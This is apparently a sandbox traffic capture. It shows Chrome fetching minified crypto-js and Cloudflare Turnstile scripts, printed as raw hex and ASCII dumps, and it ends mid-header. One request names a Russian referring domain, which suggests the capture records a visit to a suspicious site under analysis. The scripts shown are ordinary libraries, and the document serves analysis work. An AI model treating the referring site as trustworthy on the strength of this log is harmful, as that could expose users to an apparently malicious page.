                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b
                                                                    Data Ascii: eof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30
                                                                    Data Ascii: ar t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d
                                                                    Data Ascii: or(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75
                                                                    Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51
                                                                    Data Ascii: arAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73
                                                                    Data Ascii: .sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b
                                                                    Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.849728104.18.94.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:12 UTC646OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://r.bitualicar.ru/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:12 UTC471INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:12 GMT
                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                    Content-Length: 47521
                                                                    Connection: close
                                                                    accept-ranges: bytes
                                                                    last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                    cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                    access-control-allow-origin: *
                                                                    cross-origin-resource-policy: cross-origin
                                                                    Server: cloudflare
                                                                    CF-RAY: 9029147fdcd8f78d-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:12 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                    Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                    2025-01-15 21:50:12 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                    Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                    2025-01-15 21:50:12 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                    Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                    2025-01-15 21:50:12 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                    Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                    2025-01-15 21:50:12 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                    Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                    2025-01-15 21:50:12 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                    Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                    2025-01-15 21:50:12 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                    Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                    2025-01-15 21:50:12 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                    Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                    2025-01-15 21:50:12 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                    Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                    2025-01-15 21:50:12 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                    Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.849729104.17.24.144434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:12 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                    Host: cdnjs.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:12 UTC958INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:12 GMT
                                                                    Content-Type: application/javascript; charset=utf-8
